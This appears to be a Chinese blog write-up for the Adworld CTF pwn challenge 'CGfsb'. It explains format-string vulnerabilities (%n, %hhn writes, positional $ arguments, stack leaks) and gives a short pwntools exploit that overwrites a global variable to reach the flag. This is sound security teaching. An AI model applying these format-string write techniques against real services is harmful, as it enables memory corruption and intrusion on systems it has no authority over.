攻防世界PWN--CGfsb

首先checksec

32位/

开了 Canary/NX保护

再运行一下

大致就是这个流程

接下来ida里面

分析C代码

分析前先get一下格式化字符串漏洞的基础知识

举3个常见的相关函数

  1. fprintf----prints to a FILE stream
  2. printf----prints to the 'stdout' stream
  3. sprintf--prints into a string

常见语法

  1. %d---打印   signed int
  2. %u---打印   unsigned int
  3. %s---打印参数地址处的字符串
  4. %x---打印hex形式的整数
  5. %p---打印指针

eg:

printf("%10c",0x41);

打印A,宽度为10

A前面会填充9个空格 

  1. %n  将当前已打印字符的个数写入参数地址处--4字节
  2. %hn------2字节
  3. %hhn-----1字节

eg:

1.printf("%10c%n",0x41,0x8048810);

打印9个空格+A,会往地址0x8048810处写入10(4字节) 

2.printf("%4132c%hhn",0x41,0x0804883B)

4132=0x1024,往地址0x0804883B处写入1字节0x24

关于$符号 

指定占位符对应第几个参数

eg:%10$x   %x对应第10个参数

 一个问题:

如果printf的参数不足,会发生什么?

假设这些参数存在,在对应的栈/寄存器上找到这些参数,将其打印出来

这样就会将栈上一些重要的信息地址泄露出来 ,向其写入后门函数,拿到shell

参数不足

32位直接泄露栈上地址/64位先泄露6个寄存器上的地址,再栈

如果  pwnme == 8 ,即可cat flag

先泄露出参数位置

 

用gdb确定参数的位置,可以发现,第10位 

接下来编写exp

 

找到pwnme的位置

from pwn import*
#p=remote("111.200.241.244",52498)
p=process('./CG')


payload=p32(0x804A068)+b'aaaa'+b'%10$n'
p.sendlineafter("please tell me your name:\n","aaaa")
p.sendlineafter("leave your message please:\n",payload)

p.sendline(payload)
p.interactive()

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值